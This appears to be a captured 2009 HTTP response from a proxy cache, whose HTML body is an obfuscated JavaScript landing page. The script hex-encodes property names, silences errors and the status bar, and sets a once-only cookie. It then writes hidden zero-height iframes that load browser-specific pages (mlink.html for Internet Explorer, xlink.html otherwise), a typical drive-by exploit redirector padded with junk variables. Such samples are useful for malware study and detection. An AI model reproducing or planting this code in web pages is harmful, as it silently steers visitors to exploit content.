HTTP/1.1 200 OK
Content-Length: 900
ETag: "fe9538a5199ac91:299"
Date: Thu, 12 Mar 2009 07:05:41 GMT
Last-Modified: Sun, 01 Mar 2009 02:58:49 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Polipo-Location: http://kghytgv.cn:6135/b094933/fx.htm
X-Polipo-Date: Thu, 12 Mar 2009 07:13:41 GMT
X-Polipo-Access: Wed, 18 Mar 2009 08:57:59 GMT

<script>
window["\x6f\x6e\x65\x72\x72\x6f\x72"]=function (){
	return true;
	
}
function init(){var kdslsd="asdcbn";
	window["\x73"+"\x74"+"\x61\x74"+"\x75\x73"]="";
	
}window["\x6f\x6e\x6c\x6f\x61\x64"]=init;
if(document.cookie.indexOf("play=")==-1)
{var ppppvvvv="gppp";var expires=new Date();var spnbv="fdsfds";
	expires.setTime(expires.getTime()+0*60*60*1000);	
	document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
	var rcaac="d";	
	if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
	{
		
		document.write("");	
		document.write("<IFrame src=mlink.html width=100 height=0></iframe>");		
		document.write("");		
		
	}
	else {
		
		document.write("");	
		var sdcxcap="ds";	
		document.write("<iframe src=xlink.html width=100 height=0></iframe>");var xcfcx="xc";
	}}
var ksp="nishiyizhizhu";var fkasacv="BS";var fkqcacv="BS";var qpqccv="BS";
</script>